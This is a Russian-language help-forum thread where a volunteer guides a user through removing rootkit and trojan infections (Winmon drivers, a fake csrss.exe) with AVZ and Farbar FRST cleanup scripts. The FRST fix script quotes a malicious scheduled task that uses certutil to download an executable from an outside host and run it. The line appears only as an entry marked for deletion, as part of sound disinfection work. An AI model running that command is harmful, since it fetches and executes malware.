PAshaSTav 0 Опубликовано 24 декабря, 2020 Share Опубликовано 24 декабря, 2020 Добрый день. Каким то образом подхватил вирусы. KVRT и CureIt! определяю, но не лечат. Помогите с удалением. CureIt! Определил: Trojan.Spybot.795 Trojan.Rootkit.22042 Trojan.Rootkit.22044 После устранения нет эффекта. Всё по прежнему и появился запрос "требуется драйвер с цифровой подписью" для Winmon.sys и WinmonProcessMonitor.sys Так же с этой машины идёт большое количество пакетов по портам ssh и winbox. Соседние ПК определяют сетевую атаку от него. P.S. У меня 3 ПК с похожей проблемой, но чуть с разным набором определившихся угроз. Рекомендации будут для всех одинаковые или мне создать отдельно 3 темы? Как мне правильно поступить? CollectionLog-2020.12.24-18.01.zip Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 24 декабря, 2020 Share Опубликовано 24 декабря, 2020 Выполните скрипт в AVZ из папки Autologger begin ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.'); ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; QuarantineFile('C:\Users\User\appdata\local\temp\csrss\wup\xarch\wup.exe',''); SetServiceStart('WinDefender', 4); DeleteService('WinDefender'); QuarantineFile('C:\Windows\System32\drivers\WinmonFS.sys',''); QuarantineFile('C:\Windows\System32\drivers\Winmon.sys',''); QuarantineFile('C:\Windows\system32\ntkrnlmp.exe',''); TerminateProcessByName('c:\users\user\appdata\local\temp\csrss\ww30.exe'); QuarantineFile('c:\users\user\appdata\local\temp\csrss\ww30.exe',''); TerminateProcessByName('c:\windows\windefender.exe'); QuarantineFile('c:\windows\windefender.exe',''); TerminateProcessByName('c:\users\user\appdata\local\temp\csrss\ml20201210.exe'); QuarantineFile('c:\users\user\appdata\local\temp\csrss\ml20201210.exe',''); TerminateProcessByName('c:\windows\rss\csrss.exe'); QuarantineFile('c:\windows\rss\csrss.exe',''); DeleteFile('c:\windows\rss\csrss.exe','32'); DeleteFile('c:\users\user\appdata\local\temp\csrss\ml20201210.exe','32'); DeleteFile('c:\windows\windefender.exe','32'); DeleteFile('c:\users\user\appdata\local\temp\csrss\ww30.exe','32'); DeleteFile('C:\Windows\System32\drivers\Winmon.sys','64'); DeleteFile('C:\Windows\System32\drivers\WinmonFS.sys','64'); BC_DeleteSvc('46e6f793093b15f1'); BC_DeleteSvc('46e735542a5b1871'); BC_DeleteSvc('46e7ac2f0a137d71'); BC_DeleteSvc('4f94e31891fea971'); BC_DeleteSvc('4F9603BA1B65E111'); BC_DeleteSvc('4F964565E818A211'); BC_DeleteSvc('4F967679104699F1'); BC_DeleteSvc('4F967DC873248411'); BC_DeleteSvc('4F96C7CAA19CD471'); BC_DeleteSvc('4F96E45043ACF711'); BC_DeleteSvc('4F96F3068A029BF1'); BC_DeleteSvc('4F9765A189735411'); BC_DeleteSvc('4F9765A2CA613091'); BC_DeleteSvc('4F9765A387DE9171'); BC_DeleteSvc('4F97D9A576B40E91'); BC_DeleteSvc('4F97E861DCD2AA91'); DeleteFile('C:\Windows\TEMP\310CB04.sys','64'); DeleteFile('C:\Windows\TEMP\2C74D8C.sys','64'); DeleteFile('C:\Windows\TEMP\2D8EDCF.sys','64'); DeleteFile('C:\Windows\TEMP\2BAFC20.sys','64'); DeleteFile('C:\Windows\TEMP\2B73C81.sys','64'); DeleteFile('C:\Windows\TEMP\2FB7163.sys','64'); DeleteFile('C:\Windows\TEMP\2E94F2E.sys','64'); DeleteFile('C:\Windows\TEMP\332EBA9.sys','64'); DeleteFile('C:\Windows\TEMP\2CD993E.sys','64'); DeleteFile('C:\Windows\TEMP\2EFF93C.sys','64'); DeleteFile('C:\Windows\TEMP\2D5D7F4.sys','64'); DeleteFile('C:\Windows\TEMP\2C7F202.sys','64'); DeleteFile('C:\Windows\TEMP\2b41d92.sys','64'); DeleteFile('C:\Windows\TEMP\2a8ebbc.sys','64'); DeleteFile('C:\Windows\TEMP\2fe5dc4.sys','64'); DeleteFile('C:\Windows\TEMP\2d1dccd.sys','64'); DeleteSchedulerTask('csrss'); DeleteFile('C:\Users\User\appdata\local\temp\csrss\wup\xarch\wup.exe','32'); BC_ImportAll; ExecuteSysClean; BC_Activate; RebootWindows(false); end.Обратите внимание: будет выполнена перезагрузка компьютера. Выполните скрипт в AVZ begin CreateQurantineArchive('c:\quarantine.zip'); end.c:\quarantine.zip загрузите по ссылке https://virusinfo.info/upload_virus.php?tid=37678 Полученный после загрузки ответ сообщите здесь. Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи. Цитата Ссылка на сообщение Поделиться на другие сайты
PAshaSTav 0 Опубликовано 24 декабря, 2020 Автор Share Опубликовано 24 декабря, 2020 Сделал. Результат загрузки Файл сохранён как 201224_153339_quarantine_5fe4b4d36c7ed.zip Размер файла 21457329 MD5 38f8a33cfdb97bfb21e8819c0408ac0f CollectionLog-2020.12.24-18.41.zip Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 24 декабря, 2020 Share Опубликовано 24 декабря, 2020 Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. 1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. 2. Убедитесь, что в окне Optional Scan отмечены List BCD и 90 Days Files. 3. Нажмите кнопку Scan. 4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. 5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt). 6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению. Цитата Ссылка на сообщение Поделиться на другие сайты
PAshaSTav 0 Опубликовано 24 декабря, 2020 Автор Share Опубликовано 24 декабря, 2020 Сделал. FRST64-результат.zip Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 24 декабря, 2020 Share Опубликовано 24 декабря, 2020 Сделайте лог TDSSkiller Цитата Ссылка на сообщение Поделиться на другие сайты
PAshaSTav 0 Опубликовано 24 декабря, 2020 Автор Share Опубликовано 24 декабря, 2020 (изменено) Обнаружил 2 объекта. Применить действия затем выслать сохранённый лог? Изменено 24 декабря, 2020 пользователем PAshaSTav Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 24 декабря, 2020 Share Опубликовано 24 декабря, 2020 Да Цитата Ссылка на сообщение Поделиться на другие сайты
PAshaSTav 0 Опубликовано 24 декабря, 2020 Автор Share Опубликовано 24 декабря, 2020 Готово. TDSSkiller log.txt Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 24 декабря, 2020 Share Опубликовано 24 декабря, 2020 Теперь удалите старый лог FRST.txt и сделайте новый. Цитата Ссылка на сообщение Поделиться на другие сайты
PAshaSTav 0 Опубликовано 24 декабря, 2020 Автор Share Опубликовано 24 декабря, 2020 Готово FRST64-результат (2).zip Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 24 декабря, 2020 Share Опубликовано 24 декабря, 2020 1. Выделите следующий код: Start:: CreateRestorePoint: HKU\S-1-5-21-4225086931-2585650374-257642021-1000\...\Run: [LingeringShape] => C:\Windows\rss\csrss.exe [4506624 2020-12-24] () [File not signed] <==== ATTENTION HKU\S-1-5-21-4225086931-2585650374-257642021-1000\...\MountPoints2: E - E:\HiSuiteDownLoader.exe HKU\S-1-5-21-4225086931-2585650374-257642021-1000\...\MountPoints2: {53d8f38a-c3da-11e9-a76f-74d435eb3279} - E:\HiSuiteDownLoader.exe HKU\S-1-5-21-4225086931-2585650374-257642021-1000\...\MountPoints2: {bfbf4df6-9611-11e8-a025-74d435eb3279} - E:\HiSuiteDownLoader.exe Task: {26EF2CF0-9953-4085-A73F-9AADC1B3EAD5} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe /31340 -> /C certutil.exe -urlcache -split -f hxxps://fotamene.com/app/app.exe C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION Task: {778B4481-E14A-4BF2-8B1E-10792EECDCF3} - \Microsoft\Windows\DiskDiagnostic\Microsoft content -> No File <==== ATTENTION Task: {A4688BD0-A25A-4FC1-813B-4C9D5200A8DD} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4506624 2020-12-24] () [File not signed] <==== ATTENTION Task: {B9379380-9DEA-40DF-AA15-24E0D014AEFF} - \Microsoft\Windows\DiskDiagnostic\System Report -> No File <==== ATTENTION "8BA309C" => service could not be unlocked. <==== ATTENTION HKLM\SYSTEM\ControlSet001\Services\8BA309C => C:\Windows\System32\drivers\8BA309C.sys [138256 2020-12-24] (Access Denied) [File not signed] <==== ATTENTION R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder) C:\Windows\windefender.exe S3 46e0afc66ee7af71; \??\C:\Windows\TEMP\2d7e3e0.sys [X] S3 46e29070b77a19f1; \??\C:\Windows\TEMP\2726818.sys [X] S3 46e66f306418c991; \??\C:\Windows\TEMP\2cfef1e.sys [X] S3 46e66f31c8c69571; \??\C:\Windows\TEMP\28fed65.sys [X] S3 46e66f33fb2115f1; \??\C:\Windows\TEMP\28e0676.sys [X] S3 46e66fc97f6ba411; \??\C:\Windows\TEMP\2a52453.sys [X] S3 46e6f79308e15971; \??\C:\Windows\TEMP\28fe188.sys [X] S3 46e73554922f6791; \??\C:\Windows\TEMP\4449383.sys [X] S3 46e7ac2f10eb3291; \??\C:\Windows\TEMP\2d1675b.sys [X] S3 4f94e318a4357e91; \??\C:\Windows\TEMP\2faa260.sys [X] S3 4F954383A0BBDE91; \??\C:\Windows\TEMP\2A49989.sys [X] S3 4F955019A5912011; \??\C:\Windows\TEMP\270B06B.sys [X] S3 4F9570AF4F6B7DF1; \??\C:\Windows\TEMP\2CD71E8.sys [X] S3 4F957188CFE36CF1; \??\C:\Windows\TEMP\2950F87.sys [X] S3 4F9619E9C91196F1; \??\C:\Windows\TEMP\2F8F4F5.sys [X] S3 4F962F68CFB766F1; \??\C:\Windows\TEMP\2F33FA3.sys [X] S3 4F9663BCC2F56E91; \??\C:\Windows\TEMP\2CA5630.sys [X] S3 4F96FBC5512FDD71; \??\C:\Windows\TEMP\2F7D8F4.sys [X] S3 4F9728B1F08583F1; \??\C:\Windows\TEMP\2E5BC2A.sys [X] S3 4F9765A1CE0F2071; \??\C:\Windows\TEMP\2ABBCC8.sys [X] S3 4F9765A252352971; \??\C:\Windows\TEMP\2D78EE0.sys [X] S3 4F9765A2EA1FD771; \??\C:\Windows\TEMP\2CFD0BB.sys [X] S3 4F9765A3A31A5B71; \??\C:\Windows\TEMP\2B27216.sys [X] S3 4F9765A4ABAD7DF1; \??\C:\Windows\TEMP\2B8719C.sys [X] S3 4F9770359BB20D71; \??\C:\Windows\TEMP\2B226E8.sys [X] S3 4F97A24752E3F791; \??\C:\Windows\TEMP\2D45E4C.sys [X] S3 4F97A247BC404891; \??\C:\Windows\TEMP\2DDE55A.sys [X] S3 4F97C4260375DD11; \??\C:\Windows\TEMP\2F10E03.sys [X] U5 8BA309C; <==== ATTENTION: Locked Service R3 Winmon; C:\Windows\System32\drivers\Winmon.sys <==== ATTENTION (Access Denied) R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys <==== ATTENTION (Access Denied) R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys <==== ATTENTION (Access Denied) <==== ATTENTION 2020-12-24 18:51 - 2020-12-24 20:51 - 000003482 _____ C:\Windows\system32\Tasks\ScheduledUpdate 2020-12-24 18:51 - 2020-12-24 20:51 - 000003170 _____ C:\Windows\system32\Tasks\csrss C:\Windows\rss\csrss.exe C:\Windows\System32\drivers\Winmon.sys C:\Windows\System32\drivers\WinmonProcessMonitor.sys C:\Users\User\AppData\Local\Temp\csrss FirewallRules: [{5F7AFEA1-2D04-4331-9C88-19C673AFDAA9}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed] FirewallRules: [{ECB91E92-3510-4761-937F-82AC95507409}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed] FirewallRules: [{7BC96BFA-193C-47EB-A5CD-971C93D4C311}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed] FirewallRules: [{5C25918D-2C95-4A0C-A5D4-C1F490485B87}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed] FirewallRules: [{6FD69086-F954-4DE2-BE06-10D6623A12BA}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe => No File FirewallRules: [{8B7BF8A3-2C28-429E-952D-70B66108392A}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe => No File FirewallRules: [{56DEFBB9-9F5F-4500-8B72-AD0F558151DC}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe => No File FirewallRules: [{58D6FB82-A149-4E95-9DBA-6DADCFB3A043}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe => No File HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\01519181.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\08948663.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\21095673.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\68412705.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\75638802.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\92825815.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\98447630.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\01519181.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\08948663.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\21095673.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\68412705.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\75638802.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\92825815.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\98447630.sys => ""="Driver" Reboot: End:: 2. Скопируйте выделенный текст (правая кнопка мыши – Копировать). 3. Запустите Farbar Recovery Scan Tool. 4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Цитата Ссылка на сообщение Поделиться на другие сайты
PAshaSTav 0 Опубликовано 24 декабря, 2020 Автор Share Опубликовано 24 декабря, 2020 готово Fixlog.txt Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 24 декабря, 2020 Share Опубликовано 24 декабря, 2020 Что с проблемой? Цитата Ссылка на сообщение Поделиться на другие сайты
PAshaSTav 0 Опубликовано 24 декабря, 2020 Автор Share Опубликовано 24 декабря, 2020 (изменено) Запросы в сеть, с него, продолжают идти по портам 22, 8728 и 8291 (несколько conhost.exe в процессах, видимо они). И с её ip продолжаются атаки по сети. После перезагрузки: Например: TDSSkiller находит 3 угрозы среди них всё так же csrss.exe и windefender.exe. И драйвера опять запрашивало. Я бы сказал, что особо ни чего не изменилось. Изменено 24 декабря, 2020 пользователем PAshaSTav Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.